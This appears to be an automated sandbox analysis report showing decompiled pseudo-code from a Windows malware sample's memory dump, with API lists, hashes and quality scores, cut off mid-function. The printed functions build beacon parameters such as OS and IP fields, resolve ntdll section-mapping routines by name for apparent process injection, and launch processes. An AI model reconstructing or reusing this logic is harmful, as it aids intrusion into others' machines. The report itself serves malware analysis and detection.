                                					_t48 =  *0x461a2d4; // 0xdad5a8
                                					_t11 = _t48 + 0x461b2d7; // 0x74636126
                                					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
                                					_t52 =  *0x461a32c; // 0x53c95b0
                                					_t121 = _t120 + 0x1c;
                                					if(_t52 != 0) {
                                						_t88 =  *0x461a2d4; // 0xdad5a8
                                						_t13 = _t88 + 0x461b676; // 0x73797326
                                						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
                                						_t121 = _t121 + 0xc;
                                						_t114 = _t114 + _t91;
                                					}
                                					_t105 =  *0x461a37c; // 0x53c9630
                                					_a28 = E04612885(0x461a00a, _t105 + 4);
                                					_t55 =  *0x461a31c; // 0x53c95e0
                                					_t107 = 0;
                                					if(_t55 != 0) {
                                						_t84 =  *0x461a2d4; // 0xdad5a8
                                						_t16 = _t84 + 0x461b8da; // 0x3d736f26
                                						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
                                						_t121 = _t121 + 0xc;
                                						_t114 = _t114 + _t87;
                                					}
                                					_t56 =  *0x461a318; // 0x0
                                					if(_t56 != _t107) {
                                						_t81 =  *0x461a2d4; // 0xdad5a8
                                						_t18 = _t81 + 0x461b8b1; // 0x3d706926
                                						wsprintfA(_t114 + _t117, _t18, _t56);
                                					}
                                					if(_a28 != _t107) {
                                						_t98 = RtlAllocateHeap( *0x461a290, _t107, 0x800);
                                						if(_t98 != _t107) {
                                							E04612DD0(GetTickCount());
                                							_t62 =  *0x461a37c; // 0x53c9630
                                							__imp__(_t62 + 0x40);
                                							asm("lock xadd [eax], ecx");
                                							_t66 =  *0x461a37c; // 0x53c9630
                                							__imp__(_t66 + 0x40);
                                							_t68 =  *0x461a37c; // 0x53c9630
                                							_t115 = E0461624D(1, _t103, _t117,  *_t68);
                                							asm("lock xadd [eax], ecx");
                                							if(_t115 != _t107) {
                                								StrTrimA(_t115, 0x46192ac);
                                								_push(_t115);
                                								_t108 = E046121C1();
                                								_v4 = _t108;
                                								if(_t108 != 0) {
                                									 *_t115 = 0;
                                									__imp__(_t98, _a8);
                                									_t109 = __imp__;
                                									 *_t109(_t98, _t108);
                                									 *_t109(_t98, _t115);
                                									_t78 = E04611032(0xffffffffffffffff, _t98, _v12, _v8);
                                									_v40 = _t78;
                                									if(_t78 != 0 && _t78 != 0x10d2) {
                                										E04611492();
                                									}
                                									HeapFree( *0x461a290, 0, _v24);
                                								}
                                								HeapFree( *0x461a290, 0, _t115);
                                								_t107 = 0;
                                							}
                                							HeapFree( *0x461a290, _t107, _t98);
                                						}
                                						HeapFree( *0x461a290, _t107, _a20);
                                					}
                                					HeapFree( *0x461a290, _t107, _t117);
                                				}
                                				return _v16;
                                			}

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 04616F1A
                                • GetTickCount.KERNEL32 ref: 04616F2E
                                • wsprintfA.USER32 ref: 04616F7D
                                • wsprintfA.USER32 ref: 04616F9A
                                • wsprintfA.USER32 ref: 04616FBB
                                • wsprintfA.USER32 ref: 04616FD9
                                • wsprintfA.USER32 ref: 04616FEE
                                • wsprintfA.USER32 ref: 0461700F
                                • wsprintfA.USER32 ref: 04617049
                                • wsprintfA.USER32 ref: 04617069
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04617084
                                • GetTickCount.KERNEL32 ref: 04617094
                                • RtlEnterCriticalSection.NTDLL(053C95F0), ref: 046170A8
                                • RtlLeaveCriticalSection.NTDLL(053C95F0), ref: 046170C6
                                  • Part of subcall function 0461624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,046170D9,00000000,053C9630), ref: 04616278
                                  • Part of subcall function 0461624D: lstrlen.KERNEL32(00000000,?,00000000,046170D9,00000000,053C9630), ref: 04616280
                                  • Part of subcall function 0461624D: strcpy.NTDLL ref: 04616297
                                  • Part of subcall function 0461624D: lstrcat.KERNEL32(00000000,00000000), ref: 046162A2
                                  • Part of subcall function 0461624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,046170D9,?,00000000,046170D9,00000000,053C9630), ref: 046162BF
                                • StrTrimA.SHLWAPI(00000000,046192AC,00000000,053C9630), ref: 046170F4
                                  • Part of subcall function 046121C1: lstrlen.KERNEL32(053C87FA,00000000,00000000,00000000,04617100,00000000), ref: 046121D1
                                  • Part of subcall function 046121C1: lstrlen.KERNEL32(?), ref: 046121D9
                                  • Part of subcall function 046121C1: lstrcpy.KERNEL32(00000000,053C87FA), ref: 046121ED
                                  • Part of subcall function 046121C1: lstrcat.KERNEL32(00000000,?), ref: 046121F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 04617112
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04617120
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04617124
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04617154
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04617163
                                • HeapFree.KERNEL32(00000000,00000000,00000000,053C9630), ref: 04617173
                                • HeapFree.KERNEL32(00000000,?), ref: 04617184
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04617192
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                • String ID:
                                • API String ID: 1837416118-0
                                • Opcode ID: cf17879c54dc5b5f48922a1734b5224cbc8adedc8d51972f46d2a349b5216cdd
                                • Instruction ID: 21bfd4f319b34e94da2d2c3ff63652265000fdf200562092d08a2458db5ea642
                                • Opcode Fuzzy Hash: cf17879c54dc5b5f48922a1734b5224cbc8adedc8d51972f46d2a349b5216cdd
                                • Instruction Fuzzy Hash: D1717FB1601205AFD321DBA8EC48E5677E8EB88715B0D551AF949C3231F63EED09DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 43%
                                			E04615927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				long _v16;
                                				WCHAR* _v20;
                                				signed int _v24;
                                				void* __esi;
                                				long _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t46;
                                				void* _t48;
                                				void* _t49;
                                				void* _t50;
                                				WCHAR* _t54;
                                				intOrPtr _t57;
                                				void* _t58;
                                				void* _t59;
                                				void* _t60;
                                				intOrPtr _t66;
                                				void* _t71;
                                				void* _t74;
                                				intOrPtr _t75;
                                				void* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t80;
                                				WCHAR* _t91;
                                
                                				_t79 =  *0x461a38c; // 0x53c9ba0
                                				_v24 = 8;
                                				_t43 = GetTickCount();
                                				_push(5);
                                				_t74 = 0xa;
                                				_v16 = _t43;
                                				_t44 = E04614E1B(_t74,  &_v16);
                                				_v8 = _t44;
                                				if(_t44 == 0) {
                                					_v8 = 0x46191ac;
                                				}
                                				_t46 = E046142F0(_t79);
                                				_v12 = _t46;
                                				if(_t46 != 0) {
                                					_t80 = __imp__;
                                					_t48 =  *_t80(_v8, _t71);
                                					_t49 =  *_t80(_v12);
                                					_t50 =  *_t80(_a4);
                                					_t54 = E04616837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                					_v20 = _t54;
                                					if(_t54 != 0) {
                                						_t75 =  *0x461a2d4; // 0xdad5a8
                                						_t16 = _t75 + 0x461baa8; // 0x530025
                                						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                						_push(4);
                                						_t77 = 5;
                                						_t57 = E04614E1B(_t77,  &_v16);
                                						_v8 = _t57;
                                						if(_t57 == 0) {
                                							_v8 = 0x46191b0;
                                						}
                                						_t58 =  *_t80(_v8);
                                						_t59 =  *_t80(_v12);
                                						_t60 =  *_t80(_a4);
                                						_t91 = E04616837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                						if(_t91 == 0) {
                                							E046150CA(_v20);
                                						} else {
                                							_t66 =  *0x461a2d4; // 0xdad5a8
                                							_t31 = _t66 + 0x461bbc8; // 0x73006d
                                							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                							 *_a16 = _v20;
                                							_v24 = _v24 & 0x00000000;
                                							 *_a20 = _t91;
                                						}
                                					}
                                					E046150CA(_v12);
                                				}
                                				return _v24;
                                			}

                                APIs
                                • GetTickCount.KERNEL32 ref: 0461593C
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 0461597C
                                • lstrlen.KERNEL32(00000000), ref: 04615985
                                • lstrlen.KERNEL32(00000000), ref: 0461598C
                                • lstrlenW.KERNEL32(80000002), ref: 04615999
                                • wsprintfW.USER32 ref: 046159D2
                                • lstrlen.KERNEL32(?,00000004), ref: 046159F9
                                • lstrlen.KERNEL32(?), ref: 04615A02
                                • lstrlen.KERNEL32(?), ref: 04615A09
                                • lstrlenW.KERNEL32(?), ref: 04615A10
                                • wsprintfW.USER32 ref: 04615A43
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                • String ID:
                                • API String ID: 822878831-0
                                • Opcode ID: a5d770d75b92e6dcbec6909c7e79ae64f6731afe536af8376581cd3eb4a4996a
                                • Instruction ID: 9351cfb6db3479f097188dd3c7865d2dafc2b21b2df0ed284d8f68edd4d6b024
                                • Opcode Fuzzy Hash: a5d770d75b92e6dcbec6909c7e79ae64f6731afe536af8376581cd3eb4a4996a
                                • Instruction Fuzzy Hash: CA416972D00218FFCF11AFA4CD48A9EBBB5EF48318F090055ED05A7231E735AA54EBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 61%
                                			E046151A8(void* __eax, void* __ecx) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* _v28;
                                				long _v32;
                                				void _v104;
                                				char _v108;
                                				long _t39;
                                				intOrPtr _t43;
                                				intOrPtr _t50;
                                				void* _t52;
                                				intOrPtr _t53;
                                				void* _t61;
                                				intOrPtr* _t66;
                                				intOrPtr* _t73;
                                				intOrPtr* _t76;
                                
                                				_t1 = __eax + 0x14; // 0x74183966
                                				_t71 =  *_t1;
                                				_t39 = E04614F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                				_v8 = _t39;
                                				if(_t39 != 0) {
                                					L12:
                                					return _v8;
                                				}
                                				E046177A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
                                				_t43 = _v12(_v12);
                                				_v8 = _t43;
                                				if(_t43 == 0 && ( *0x461a2b8 & 0x00000001) != 0) {
                                					_v32 = 0;
                                					asm("stosd");
                                					asm("stosd");
                                					asm("stosd");
                                					_v108 = 0;
                                					memset( &_v104, 0, 0x40);
                                					_t50 =  *0x461a2d4; // 0xdad5a8
                                					_t18 = _t50 + 0x461b4a3; // 0x73797325
                                					_t52 = E04616343(_t18);
                                					_v12 = _t52;
                                					if(_t52 == 0) {
                                						_v8 = 8;
                                					} else {
                                						_t53 =  *0x461a2d4; // 0xdad5a8
                                						_t20 = _t53 + 0x461b770; // 0x53c8d18
                                						_t21 = _t53 + 0x461b0af; // 0x4e52454b
                                						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                                						if(_t66 == 0) {
                                							_v8 = 0x7f;
                                						} else {
                                							_t73 = __imp__;
                                							_v108 = 0x44;
                                							 *_t73(0);
                                							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
                                							 *_t73(1);
                                							if(_t61 == 0) {
                                								_v8 = GetLastError();
                                							} else {
                                								CloseHandle(_v28);
                                								CloseHandle(_v32);
                                							}
                                						}
                                						HeapFree( *0x461a290, 0, _v12);
                                					}
                                				}
                                				_t76 = _v16;
                                				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
                                				E046150CA(_t76);
                                				goto L12;
                                			}

                                APIs
                                  • Part of subcall function 04614F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,046151C4,?,?,?,?,00000000,00000000), ref: 04614F7F
                                  • Part of subcall function 04614F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04614FA1
                                  • Part of subcall function 04614F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04614FB7
                                  • Part of subcall function 04614F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04614FCD
                                  • Part of subcall function 04614F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04614FE3
                                  • Part of subcall function 04614F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04614FF9
                                • memset.NTDLL ref: 04615212
                                  • Part of subcall function 04616343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0461522B,73797325), ref: 04616354
                                  • Part of subcall function 04616343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0461636E
                                • GetModuleHandleA.KERNEL32(4E52454B,053C8D18,73797325), ref: 04615249
                                • GetProcAddress.KERNEL32(00000000), ref: 04615250
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0461526A
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04615288
                                • CloseHandle.KERNEL32(00000000), ref: 04615297
                                • CloseHandle.KERNEL32(?), ref: 0461529C
                                • GetLastError.KERNEL32 ref: 046152A0
                                • HeapFree.KERNEL32(00000000,?), ref: 046152BC
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                • String ID:
                                • API String ID: 91923200-0
                                • Opcode ID: beebba47437aec86db0f5d23962df189c7deb921b1c80f0872c6333e8648cb50
                                • Instruction ID: 4c0a1b928df1955034b0e81233f3930909866cdc9119731a0b04f9b491234252
                                • Opcode Fuzzy Hash: beebba47437aec86db0f5d23962df189c7deb921b1c80f0872c6333e8648cb50
                                • Instruction Fuzzy Hash: 2E316B72901219FFDB11AFE4C8489DEBFB8FF48300F184056E506A3230E775AA45DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04614F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                				intOrPtr _v8;
                                				intOrPtr _t23;
                                				intOrPtr _t26;
                                				_Unknown_base(*)()* _t28;
                                				intOrPtr _t30;
                                				_Unknown_base(*)()* _t32;
                                				intOrPtr _t33;
                                				_Unknown_base(*)()* _t35;
                                				intOrPtr _t36;
                                				_Unknown_base(*)()* _t38;
                                				intOrPtr _t39;
                                				_Unknown_base(*)()* _t41;
                                				intOrPtr _t44;
                                				struct HINSTANCE__* _t48;
                                				intOrPtr _t54;
                                
                                				_t54 = E04616837(0x20);
                                				if(_t54 == 0) {
                                					_v8 = 8;
                                				} else {
                                					_t23 =  *0x461a2d4; // 0xdad5a8
                                					_t1 = _t23 + 0x461b11a; // 0x4c44544e
                                					_t48 = GetModuleHandleA(_t1);
                                					_t26 =  *0x461a2d4; // 0xdad5a8
                                					_t2 = _t26 + 0x461b792; // 0x7243775a
                                					_v8 = 0x7f;
                                					_t28 = GetProcAddress(_t48, _t2);
                                					 *(_t54 + 0xc) = _t28;
                                					if(_t28 == 0) {
                                						L8:
                                						E046150CA(_t54);
                                					} else {
                                						_t30 =  *0x461a2d4; // 0xdad5a8
                                						_t5 = _t30 + 0x461b77f; // 0x614d775a
                                						_t32 = GetProcAddress(_t48, _t5);
                                						 *(_t54 + 0x10) = _t32;
                                						if(_t32 == 0) {
                                							goto L8;
                                						} else {
                                							_t33 =  *0x461a2d4; // 0xdad5a8
                                							_t7 = _t33 + 0x461b74e; // 0x6e55775a
                                							_t35 = GetProcAddress(_t48, _t7);
                                							 *(_t54 + 0x14) = _t35;
                                							if(_t35 == 0) {
                                								goto L8;
                                							} else {
                                								_t36 =  *0x461a2d4; // 0xdad5a8
                                								_t9 = _t36 + 0x461b72e; // 0x4e6c7452
                                								_t38 = GetProcAddress(_t48, _t9);
                                								 *(_t54 + 0x18) = _t38;
                                								if(_t38 == 0) {
                                									goto L8;
                                								} else {
                                									_t39 =  *0x461a2d4; // 0xdad5a8
                                									_t11 = _t39 + 0x461b7a2; // 0x6c43775a
                                									_t41 = GetProcAddress(_t48, _t11);
                                									 *(_t54 + 0x1c) = _t41;
                                									if(_t41 == 0) {
                                										goto L8;
                                									} else {
                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                										_t44 = E04614248(_t54, _a8);
                                										_v8 = _t44;
                                										if(_t44 != 0) {
                                											goto L8;
                                										} else {
                                											 *_a12 = _t54;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}

                                APIs
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,046151C4,?,?,?,?,00000000,00000000), ref: 04614F7F
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04614FA1
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04614FB7
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04614FCD
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04614FE3
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04614FF9
                                  • Part of subcall function 04614248: memset.NTDLL ref: 046142C7
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: 5237cfe0669c0e99f0886ffe65fad03fdc323eedfe900832c3099c5226cf6893
                                • Instruction ID: 7bcb4bd5f13ec70d2e2df009f61d9abd070f0e497a6db61495285d49b6f07fe4
                                • Opcode Fuzzy Hash: 5237cfe0669c0e99f0886ffe65fad03fdc323eedfe900832c3099c5226cf6893
                                • Instruction Fuzzy Hash: C1213CB1600246AFD750DFB9D844E5AB7ECEB58745B0D541AE409C7222F739F905CF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 22%
                                			E04612A23(signed int __eax, signed int _a4, signed int _a8) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				signed int _v20;
                                				intOrPtr _t81;
                                				char _t83;
                                				signed int _t90;
                                				signed int _t97;
                                				signed int _t99;
                                				char _t101;
                                				unsigned int _t102;
                                				intOrPtr _t103;
                                				char* _t107;
                                				signed int _t110;
                                				signed int _t113;
                                				signed int _t118;
                                				signed int _t122;
                                				intOrPtr _t124;
                                
                                				_t102 = _a8;
                                				_t118 = 0;
                                				_v20 = __eax;
                                				_t122 = (_t102 >> 2) + 1;
                                				_v8 = 0;
                                				_a8 = 0;
                                				_t81 = E04616837(_t122 << 2);
                                				_v16 = _t81;
                                				if(_t81 == 0) {
                                					_push(8);
                                					_pop(0);
                                					L37:
                                					return 0;
                                				}
                                				_t107 = _a4;
                                				_a4 = _t102;
                                				_t113 = 0;
                                				while(1) {
                                					_t83 =  *_t107;
                                					if(_t83 == 0) {
                                						break;
                                					}
                                					if(_t83 == 0xd || _t83 == 0xa) {
                                						if(_t118 != 0) {
                                							if(_t118 > _v8) {
                                								_v8 = _t118;
                                							}
                                							_a8 = _a8 + 1;
                                							_t118 = 0;
                                						}
                                						 *_t107 = 0;
                                						goto L16;
                                					} else {
                                						if(_t118 != 0) {
                                							L10:
                                							_t118 = _t118 + 1;
                                							L16:
                                							_t107 = _t107 + 1;
                                							_t15 =  &_a4;
                                							 *_t15 = _a4 - 1;
                                							if( *_t15 != 0) {
                                								continue;
                                							}
                                							break;
                                						}
                                						if(_t113 == _t122) {
                                							L21:
                                							if(_a8 <= 0x20) {
                                								_push(0xb);
                                								L34:
                                								_pop(0);
                                								L35:
                                								E046150CA(_v16);
                                								goto L37;
                                							}
                                							_t103 = E04616837((_v8 + _v8 + 5) * _a8 + 4);
                                							if(_t103 == 0) {
                                								_push(8);
                                								goto L34;
                                							}
                                							_t90 = _a8;
                                							_a4 = _a4 & 0x00000000;
                                							_v8 = _v8 & 0x00000000;
                                							_t124 = _t103 + _t90 * 4;
                                							if(_t90 <= 0) {
                                								L31:
                                								 *0x461a2cc = _t103;
                                								goto L35;
                                							}
                                							do {
                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                								_v12 = _v12 & 0x00000000;
                                								if(_a4 <= 0) {
                                									goto L30;
                                								} else {
                                									goto L26;
                                								}
                                								while(1) {
                                									L26:
                                									_t99 = _v12;
                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
                                									if(_t99 == 0) {
                                										break;
                                									}
                                									_v12 = _v12 + 1;
                                									if(_v12 < _a4) {
                                										continue;
                                									}
                                									goto L30;
                                								}
                                								_v8 = _v8 - 1;
                                								L30:
                                								_t97 = _a4;
                                								_a4 = _a4 + 1;
                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                								__imp__(_t124);
                                								_v8 = _v8 + 1;
                                								_t124 = _t124 + _t97 + 1;
                                							} while (_v8 < _a8);
                                							goto L31;
                                						}
                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                						_t101 = _t83;
                                						if(_t83 - 0x61 <= 0x19) {
                                							_t101 = _t101 - 0x20;
                                						}
                                						 *_t107 = _t101;
                                						_t113 = _t113 + 1;
                                						goto L10;
                                					}
                                				}
                                				if(_t118 != 0) {
                                					if(_t118 > _v8) {
                                						_v8 = _t118;
                                					}
                                					_a8 = _a8 + 1;
                                				}
                                				goto L21;
                                 			}

                                APIs
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • lstrcpy.KERNEL32(63699BC4,00000020), ref: 04612B20
                                • lstrcat.KERNEL32(63699BC4,00000020), ref: 04612B35
                                • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04612B4C
                                • lstrlen.KERNEL32(63699BC4), ref: 04612B70
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                 • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                 • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                 • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                 • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 83cc96e9acb4d31a94b57754436f0c0c849e8caf24032c7e10cbc8b6b970d660
                                • Instruction ID: 12b85ed56d63d97e732d5c20a592e4f53bee4bb2ccbb669abd3de81424b2a8c3
                                • Opcode Fuzzy Hash: 83cc96e9acb4d31a94b57754436f0c0c849e8caf24032c7e10cbc8b6b970d660
                                • Instruction Fuzzy Hash: 8C51D571A00108EFDF21CF99C494AADBBB5FF55314F09809BE815AB321E770BA51CB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04614C1B(intOrPtr _a4) {
                                				void* _t2;
                                				long _t4;
                                				void* _t5;
                                				long _t6;
                                				void* _t7;
                                
                                				_t2 = CreateEventA(0, 1, 0, 0);
                                				 *0x461a2c4 = _t2;
                                				if(_t2 == 0) {
                                					return GetLastError();
                                				}
                                				_t4 = GetVersion();
                                				if(_t4 <= 5) {
                                					_t5 = 0x32;
                                					return _t5;
                                				}
                                				 *0x461a2b4 = _t4;
                                				_t6 = GetCurrentProcessId();
                                				 *0x461a2b0 = _t6;
                                				 *0x461a2bc = _a4;
                                				_t7 = OpenProcess(0x10047a, 0, _t6);
                                				 *0x461a2ac = _t7;
                                				if(_t7 == 0) {
                                					 *0x461a2ac =  *0x461a2ac | 0xffffffff;
                                				}
                                				return 0;
                                 			}

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04616B4E,?,?,00000001), ref: 04614C23
                                • GetVersion.KERNEL32(?,00000001), ref: 04614C32
                                • GetCurrentProcessId.KERNEL32(?,00000001), ref: 04614C41
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 04614C5E
                                • GetLastError.KERNEL32(?,00000001), ref: 04614C7D
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                 • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                 • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                 • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                 • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: d4a70c40a4e7aefb458c9f4613e5bfbf4b3f380a6b485817176b6ea6b3885537
                                • Instruction ID: cdfa27ce0fb4e0f8de0dd822be102ab070d91e27661b62df6429222ae77a01b4
                                • Opcode Fuzzy Hash: d4a70c40a4e7aefb458c9f4613e5bfbf4b3f380a6b485817176b6ea6b3885537
                                • Instruction Fuzzy Hash: C7F017B0B4A3019FD7208FA5A819B253BB5E704742F0CA61BE546C62F0FB7A9905DF25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E04616C6D(intOrPtr* __eax) {
                                				void* _v8;
                                				WCHAR* _v12;
                                				void* _v16;
                                				char _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				void* _v32;
                                				intOrPtr _v40;
                                				short _v48;
                                				intOrPtr _v56;
                                				short _v64;
                                				intOrPtr* _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t57;
                                				intOrPtr* _t58;
                                				intOrPtr* _t60;
                                				void* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				intOrPtr* _t67;
                                				intOrPtr* _t69;
                                				intOrPtr* _t71;
                                				intOrPtr* _t74;
                                				intOrPtr* _t76;
                                				intOrPtr _t78;
                                				intOrPtr* _t82;
                                				intOrPtr* _t86;
                                				intOrPtr _t102;
                                				intOrPtr _t108;
                                				void* _t117;
                                				void* _t121;
                                				void* _t122;
                                				intOrPtr _t129;
                                
                                				_t122 = _t121 - 0x3c;
                                				_push( &_v8);
                                				_push(__eax);
                                				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                				if(_t117 >= 0) {
                                					_t54 = _v8;
                                					_t102 =  *0x461a2d4; // 0xdad5a8
                                					_t5 = _t102 + 0x461b038; // 0x3050f485
                                					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                					_t56 = _v8;
                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                					if(_t117 >= 0) {
                                						__imp__#2(0x46192b0);
                                						_v28 = _t57;
                                						if(_t57 == 0) {
                                							_t117 = 0x8007000e;
                                						} else {
                                							_t60 = _v32;
                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                							_t86 = __imp__#6;
                                							_t117 = _t61;
                                							if(_t117 >= 0) {
                                								_t63 = _v24;
